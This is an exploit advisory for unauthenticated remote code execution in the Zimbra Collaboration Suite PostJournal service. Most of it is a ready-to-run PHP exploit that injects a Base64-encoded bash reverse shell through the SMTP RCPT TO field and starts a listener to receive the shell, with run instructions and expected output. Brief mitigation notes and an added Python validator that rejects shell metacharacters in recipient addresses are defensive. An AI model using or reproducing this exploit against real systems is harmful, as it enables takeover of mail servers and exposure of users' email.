=============================================================================================================================================
| # Title Zimbra Collaboration Suite Postjournal 10.0.x Remote Code Execution
=============================================================================================================================================
| # Title : Zimbra Collaboration Suite Postjournal 10.0.x before 10.0.9 Unauthenticated RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.zimbra.com/ |
=============================================================================================================================================
POC :
1. Overview
-----------
A critical vulnerability exists in the Zimbra Collaboration Suite (ZCS) PostJournal service that allows attackers to execute arbitrary system commands without authentication.
The vulnerability is triggered through SMTP injection using a malicious RCPT TO parameter. This exploit provides full remote command execution (RCE) as the Zimbra user, enabling an attacker to gain a reverse shell.
The root cause is improper sanitization of user-controlled email fields inside the PostJournal processing mechanism.
----------------------------------------------
2. Vulnerability Details
------------------------
The PostJournal service processes incoming emails and interacts with external components. Due to a command injection flaw in the way Zimbra handles the RCPT TO address, attackers can inject shell commands using syntax such as:
RCPT TO:<aabbb$(COMMAND)@domain.com>
The address reaches a shell unescaped, so the `$()` expression is expanded as a command substitution and the embedded command runs in the mail server's context.
This leads to full RCE.
----------------------------------------------
3. Requirements
---------------
• ZCS installation (vulnerable version)
• SMTP access reachable externally
• No authentication required
• Attacker's listener ready to receive reverse shell
----------------------------------------------
4. Proof of Concept (PoC)
-------------------------
The exploit uses standard SMTP commands:
EHLO localhost
MAIL FROM:<
RCPT TO:<aabbb$(payload)@test.com>
DATA
Test
.
QUIT
The payload is a Base64-encoded reverse shell executed via:
echo BASE64 | base64 -d | bash
----------------------------------------------
5. PHP Exploit Code
-------------------------------------------
The following PHP PoC sends the exploit to Zimbra and creates a built-in TCP listener without using `pcntl_fork()`:
<?php
set_time_limit(0);
error_reporting(E_ALL);
ob_implicit_flush(true);

class SMTPExploit {
    private $target;
    private $port;
    private $lhost;
    private $lport;
    private $mail_from;
    private $rcpt_to;
    private $sock;
    private $command;

    public function __construct($target, $port, $lhost, $lport) {
        $this->target = $target;
        $this->port = $port;
        $this->lhost = $lhost;
        $this->lport = $lport;
        $this->mail_from = $this->random_email();
        $this->rcpt_to = $this->random_email();
        $this->command = $this->generate_b64_shell();
    }

    private function random_email() {
        return substr(md5(rand()), 0, 8)."@test.com";
    }

    private function generate_b64_shell() {
        $cmd = "/bin/bash -i 5<> /dev/tcp/{$this->lhost}/{$this->lport} 0<&5 1>&5 2>&5";
        $b64 = base64_encode($cmd);
        return "echo ${b64}|base64 -d|bash";
    }

    private function injected_rcpt() {
        return "aabbb\$({$this->command})@{$this->rcpt_to}";
    }

    private function connect() {
        $this->sock = fsockopen($this->target, $this->port, $e, $s, 10);
        if (!$this->sock) die("[!] Cannot connect to SMTP server\n");
        fgets($this->sock, 4096);
    }

    private function send($cmd) {
        fwrite($this->sock, $cmd."\r\n");
        return fgets($this->sock, 4096);
    }

    public function run() {
        echo "[*] Connecting to SMTP...\n";
        $this->connect();
        $this->send("EHLO localhost");
        $this->send("MAIL FROM:<{$this->mail_from}>");
        $inj = $this->injected_rcpt();
        $this->send("RCPT TO:<{$inj}>");
        $this->send("DATA");
        fwrite($this->sock, "Test\r\n.\r\n");
        $this->send("QUIT");
        fclose($this->sock);
        echo "[+] Exploit Sent.\n";
    }
}

class Listener {
    private $host;
    private $port;

    public function __construct($h, $p) {
        $this->host = $h;
        $this->port = $p;
    }

    public function start() {
        echo "[*] Starting listener on {$this->host}:{$this->port}\n";
        $sock = stream_socket_server("tcp://{$this->host}:{$this->port}", $e, $s);
        if (!$sock) die("[!] Cannot start listener\n");
        while (true) {
            $client = @stream_socket_accept($sock, 1);
            if ($client) {
                echo "[+] Connection received\n";
                $this->interactive($client);
                fclose($client);
            }
        }
    }

    private function interactive($client) {
        fwrite($client, "Connected!\n> ");
        while (!feof($client)) {
            $cmd = trim(fgets($client));
            if ($cmd === "exit") break;
            $out = shell_exec($cmd);
            fwrite($client, $out . "\n> ");
        }
    }
}

$target = $argv[1] ?? "127.0.0.1";
$port   = $argv[2] ?? 25;
$lhost  = $argv[3] ?? "0.0.0.0";
$lport  = $argv[4] ?? 4444;

echo "[*] Launching listener thread...\n";
$listener = new Listener($lhost, $lport);
$listener_running = false;
$exploit_sent = false;

while (true) {
    if (!$listener_running) {
        echo "[*] Listener online...\n";
        $listener_running = true;
        $listener->start();
    }
    if (!$exploit_sent) {
        echo "[*] Sending exploit...\n";
        $e = new SMTPExploit($target, $port, $lhost, $lport);
        $e->run();
        $exploit_sent = true;
    }
    usleep(10000);
}
?>
-------------------------
How to Run the Exploit
-------------------------
### **1. Save the script**
Save the code as:
zimbra_rce.php
### **2. Start it from terminal**
Windows example:
php zimbra_rce.php 192.168.1.50 25 192.168.1.10 4444
Linux example:
php zimbra_rce.php mail.example.com 25 attacker-ip 4444
### **Arguments format:**
| Argument | Description |
|---------|-------------|
| 1 | Target Zimbra SMTP IP |
| 2 | SMTP port (default 25) |
| 3 | Attacker listener IP |
| 4 | Listener port |
### **3. Wait for Shell**
If the server is vulnerable, you will see:
[*] Listener online...
[*] Sending exploit...
[+] Exploit Sent.
[+] Connection received
Connected!
>
Now you have a remote shell.
----------------------------------------------
6. Impact
---------
• Full remote command execution
• Full server compromise possible
• Email data exposure
• Privilege escalation (depending on system configuration)
• Lateral movement inside the network
----------------------------------------------
7. Mitigation
-------------
Until patches are applied:
• Block external SMTP access to PostJournal component
• Apply strict sanitization rules for RCPT field
• Monitor suspicious SMTP activity
• Restrict Zimbra service user privileges
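The second and third mitigation points above (strict RCPT sanitization and monitoring of suspicious SMTP activity) and the injection pattern shown in section 2 can be exercised with the following check. This is an added example and is not code from the advisory or from Zimbra; it is a stand-alone validator and transcript scanner, and the sample SMTP session it runs over is constructed here, with the injected line mirroring the RCPT TO shape quoted in section 2. The allow-list it applies is deliberately tighter than what RFC 5321 permits, which is an assumption of this example rather than anything the advisory specifies.

```python
"""Defensive check for shell-metacharacter injection in SMTP RCPT TO addresses.

Added example (not part of the original advisory): a strict validator that a
mail gateway, milter or log-review script could apply to recipient addresses
before they reach any component that builds a command line from them.
"""
import re
from typing import List, Optional, Tuple

# Characters that let a string reach a shell as something other than data.
# Any one of these in a recipient address is a hard reject.
SHELL_META = re.compile(r"[$`|;&<>(){}\\\x00-\x1f]")

# Allow-list for the local-part. This is deliberately tighter than RFC 5321
# atext (which permits $, {, |, etc.): the goal is "never reaches a shell",
# not "every RFC-legal address is accepted". Quoted local-parts are rejected,
# so a deployment would have to decide whether that false positive is acceptable.
LOCAL_PART = re.compile(r"^[A-Za-z0-9._+=-]{1,64}$")
DOMAIN = re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$")

RCPT_RE = re.compile(r"^RCPT TO:\s*<(?P<addr>[^>]*)>", re.IGNORECASE)


def parse_rcpt(line: str) -> Optional[str]:
    """Return the address inside RCPT TO:<...>, or None if the line is not RCPT TO."""
    m = RCPT_RE.match(line.strip())
    return m.group("addr") if m else None


def classify_rcpt(addr: str) -> Tuple[str, str]:
    """Return ("ok", "") or ("reject", reason) for a recipient address."""
    if SHELL_META.search(addr):
        return "reject", "shell metacharacter in address"
    if addr.count("@") != 1:
        return "reject", "address must contain exactly one @"
    local, domain = addr.rsplit("@", 1)
    if not LOCAL_PART.match(local):
        return "reject", "local-part outside strict allow-list"
    if not DOMAIN.match(domain):
        return "reject", "malformed domain"
    return "ok", ""


def scan_session(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan an SMTP command transcript; return (line_no, addr, reason) for rejected RCPTs."""
    findings = []
    for n, line in enumerate(lines, 1):
        addr = parse_rcpt(line)
        if addr is None:
            continue
        verdict, reason = classify_rcpt(addr)
        if verdict == "reject":
            findings.append((n, addr, reason))
    return findings


# Constructed transcript for demonstration (not captured traffic); the fourth
# line mirrors the RCPT TO pattern quoted in section 2 of the advisory.
SAMPLE_SESSION = [
    "EHLO localhost",
    "MAIL FROM:<sender@test.com>",
    "RCPT TO:<alice.smith+news@example.com>",
    "RCPT TO:<aabbb$(COMMAND)@domain.com>",
    'RCPT TO:<"first last"@example.com>',
    "DATA",
]

if __name__ == "__main__":
    for n, addr, reason in scan_session(SAMPLE_SESSION):
        print(f"line {n}: reject <{addr}>: {reason}")
```

Run over the constructed session, the scanner rejects line 4 for the shell metacharacter and line 5 because the quoted local-part falls outside the allow-list, while the plus-addressed recipient on line 3 passes. The metacharacter test runs before any syntax check on purpose: a reject on that ground is the signal worth alerting on, whereas an allow-list miss is more often a legitimate but unusual address.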
----------------------------------------------
8. Conclusion
-------------
This vulnerability presents a severe risk and must be mitigated immediately.
The exploit demonstrates how a simple SMTP injection can lead to full RCE, highlighting the need for strict input validation in email-processing systems.
===================================================================================================
Greetings to: jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
===================================================================================================